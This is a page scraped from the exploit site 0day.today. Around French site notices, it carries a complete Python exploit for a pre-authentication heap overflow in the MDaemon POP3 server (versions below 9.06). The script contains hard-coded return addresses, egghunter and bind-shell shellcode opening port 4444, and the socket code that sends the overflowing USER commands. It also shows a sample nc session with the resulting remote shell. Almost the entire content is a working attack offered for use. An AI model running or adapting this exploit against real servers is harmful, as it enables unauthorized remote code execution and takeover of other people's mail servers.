0day.today - La plus grande base de données de Exploit dans le monde.
![](/img/logo_green.jpg)
Nous utilisons un domaine DOMAIN_LINK
Si vous voulez acheter un exploit ou payer un service vous avez besoins d'Or. Nous ne voulons pas que notre site soit utiliser comme outil de piratage , de sorte que touts types d'actions qui pourrais affecter illegalement d'autres utilisateurs ou sites web ou vous n'avez pas l'autorisation vous serez bannit et votre compte ainsi que vos donnees seront supprimees.
Les administrateur de 0day.today utilises des moyens de contacts officiels. Mefiez-vous des imposteurs!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Lire le [ J'accepte ]
- Lire le [ Envoyer ] Regles
- Visiter le [ faq ] page
- [ Enregistrement ] profil
- Obtenir [ GOLD ]
- Si vous voulez [ vendre ]
- Si vous voulez [ acheter ]
- Si vous vous perdez [ Compte ]
- Une questions [ [email protected] ]
- Connexion
- Page d'enregistrement
- Restauration de compte
- Foire aux questions
- Contactez-nous
- Regle de publication
- Page de contrat
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Vous pouvez nous contacter par:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
MDaemon POP3 Server < 9.06 (USER) Remote Heap Overflow Exploit
Auteur
Risque
![](/img/risk/critlow_0.gif)
Security Risk Unsored
]0day-ID
Catégorie
Date d'ajout
Plateforme
============================================================== MDaemon POP3 Server < 9.06 (USER) Remote Heap Overflow Exploit ============================================================== #!/usr/bin/python import sys import struct import socket from time import sleep ######################################################################################## # MDaemon Pre Authentication (USER) Heap Overflow # Code based on Leon Juranic's exploit # Coded by muts - [email protected] # http://www.hackingdefined.com # http://www.remote-exploit.org # Tested on: # Mdaemon 9.0.5 # Mdaemon 7.2.3 # Mdaemon 7.2.2 # Mdaemon 7.2.1 # Mdaemon 7.2.0 # Possibly Others # PLEASE CONTINUE READING ! # Huge greets to xbxice and talz for leading me away from the darkness ######################################################################################## # Mdaemon is wierd. It seems like their developers decided to annoy everyone # by making their software do unexpected things. # The exploit overwrites UnhandledExceptionFilter, and jumps to an egghunter # shellcode - which then scans the memory, and executes a bindshell on port 4444. # # On some Win2k SP4 machines, I found SetUnhandledExceptionFilter at 0x00000214, # for which I unfortunately had no explenation. # I later found out that these machines were fully patched ... # After inspecting kernel32.dll from my SP4 (not fully patched) and comparing it to # todays' version, I noticed that the SetunhandledExceptionFilter function had changed, # and looks suspiciously similar to XP SP2... # Note that my unpatched win2k was last patched 2-3 weeks ago, # so I suspect this change is recent. # The end of easy UnhandledExceptionFilter exploitation on Win2k ? # # So, this is a partially working exploit, on unpatched win2k boxes.... # Kiddies, treat this exploit as DOS :) # # I got 3 types of results with this code: # # 1. Shell :) # 2. Mdaemon process shoots up to 100%, scanning memory for shellcode that isn't there. # 3. Plain ugly crash - oh well. # # At minimum, I'de check the UnhandledExceptionFilter address before running the exploit. ######################################################################################## # # C:\Documents and Settings\muts>nc -v 192.168.220.128 4444 # 97DACBEC7CA4483 [192.168.220.128] 4444 (?) open # Microsoft Windows 2000 [Version 5.00.2195] # (C) Copyright 1985-2000 Microsoft Corp. # # C:\MDaemon\APP> ######################################################################################## host="192.168.220.128" ret = struct.pack("<L",0x7c2f62b6) # 7c2f62b6 advapi.dll JMP ESI+48 SP4 No Patches ueh = struct.pack("<L",0x7C54144C) # SetUnhandledExceptionFilter 0x7C54144C win2k SP4 No Patches tap = struct.pack("<L",0xeb169090) # Short Jump over some garbage # skape's egghunter shellcode egghunter ="\xeb\x21\x59\xb8\x74\x30\x30\x77\x51\x6a\xff\x33\xdb\x64\x89\x23" egghunter +="\x6a\x02\x59\x8b\xfb\xf3\xaf\x75\x07\xff\xe7\x66\x81\xcb\xff\x0f" egghunter +="\x43\xeb\xed\xe8\xda\xff\xff\xff\x6a\x0c\x59\x8b\x04\x0c\xb1\xb8" egghunter +="\x83\x04\x08\x06\x58\x83\xc4\x10\x50\x33\xc0\xc3" # win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum shellcode ="\x90\x90\x74\x30\x30\x77\x74\x30\x30\x77" # t00wt00w (!) shellcode +="\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" shellcode +="\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" shellcode +="\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" shellcode +="\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" shellcode +="\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e" shellcode +="\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x38" shellcode +="\x4e\x46\x46\x52\x46\x42\x4b\x48\x45\x34\x4e\x53\x4b\x48\x4e\x57" shellcode +="\x45\x50\x4a\x47\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x48" shellcode +="\x4f\x45\x42\x52\x41\x30\x4b\x4e\x49\x34\x4b\x58\x46\x33\x4b\x48" shellcode +="\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x38\x42\x4c" shellcode +="\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" shellcode +="\x46\x4f\x4b\x53\x46\x45\x46\x32\x4a\x52\x45\x37\x45\x4e\x4b\x38" shellcode +="\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x30\x4b\x54" shellcode +="\x4b\x58\x4f\x45\x4e\x31\x41\x50\x4b\x4e\x43\x50\x4e\x42\x4b\x38" shellcode +="\x49\x58\x4e\x46\x46\x52\x4e\x31\x41\x46\x43\x4c\x41\x53\x4b\x4d" shellcode +="\x46\x56\x4b\x58\x43\x44\x42\x33\x4b\x48\x42\x54\x4e\x30\x4b\x38" shellcode +="\x42\x57\x4e\x51\x4d\x4a\x4b\x58\x42\x54\x4a\x50\x50\x45\x4a\x46" shellcode +="\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56" shellcode +="\x43\x35\x48\x46\x4a\x56\x43\x43\x44\x43\x4a\x36\x47\x47\x43\x57" shellcode +="\x44\x33\x4f\x45\x46\x45\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e" shellcode +="\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x55\x49\x38\x45\x4e" shellcode +="\x48\x36\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x55\x4c\x36\x44\x50" shellcode +="\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x55" shellcode +="\x4f\x4f\x48\x4d\x43\x45\x43\x55\x43\x45\x43\x35\x43\x55\x43\x34" shellcode +="\x43\x45\x43\x44\x43\x45\x4f\x4f\x42\x4d\x48\x36\x4a\x56\x41\x51" shellcode +="\x4e\x35\x48\x46\x43\x35\x49\x38\x41\x4e\x45\x39\x4a\x46\x46\x4a" shellcode +="\x4c\x51\x42\x37\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x36\x42\x51" shellcode +="\x41\x35\x45\x55\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x42" shellcode +="\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x55\x4f\x4f\x42\x4d" shellcode +="\x4a\x46\x45\x4e\x49\x44\x48\x48\x49\x34\x47\x55\x4f\x4f\x48\x4d" shellcode +="\x42\x35\x46\x35\x46\x35\x45\x45\x4f\x4f\x42\x4d\x43\x49\x4a\x56" shellcode +="\x47\x4e\x49\x57\x48\x4c\x49\x47\x47\x55\x4f\x4f\x48\x4d\x45\x45" shellcode +="\x4f\x4f\x42\x4d\x48\x56\x4c\x56\x46\x56\x48\x56\x4a\x46\x43\x46" shellcode +="\x4d\x46\x49\x38\x45\x4e\x4c\x46\x42\x55\x49\x55\x49\x32\x4e\x4c" shellcode +="\x49\x38\x47\x4e\x4c\x36\x46\x34\x49\x58\x44\x4e\x41\x33\x42\x4c" shellcode +="\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x52\x50\x4f\x44\x34\x4e\x42" shellcode +="\x43\x59\x4d\x58\x4c\x57\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56" shellcode +="\x44\x37\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x47\x46\x44\x4f\x4f" shellcode +="\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x55\x41\x55\x41\x55\x4c\x56" shellcode +="\x41\x50\x41\x45\x41\x35\x45\x45\x41\x55\x4f\x4f\x42\x4d\x4a\x56" shellcode +="\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x46" shellcode +="\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x58\x47\x55\x4e\x4f" shellcode +="\x43\x38\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x35\x4f\x4f\x42\x4d" shellcode +="\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x35\x43\x55\x4f\x4f\x48\x4d" shellcode +="\x4f\x4f\x42\x4d\x5a" buffer ="AAA"+tap+"BBBB"+ret+ueh+"\x90"*90 +egghunter+"C"*346 for x in range(5): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host,110)) data=s.recv(1024) print data s.send('USER '+'@A' * 1600 + '\x90'*5945 + shellcode +'D'*3711 + '\r\n') s.send('QUIT\r\n') s.close() sleep(1) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host,110)) data=s.recv(1024) print data s.send('USER ' + '@A@A'+ buffer + '\r\n') data=s.recv(1024) print data s.send('USER ' + 'A' * 3370 + '\r\n') s.close() s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host,110)) data=s.recv(1024) print data s.send('USER ' + '@A@A'+ buffer + '\r\n') data=s.recv(1024) print data s.send('USER ' + 'A' * 3370 + '\r\n') s.close() sleep(1) # 0day.today [2024-06-30] #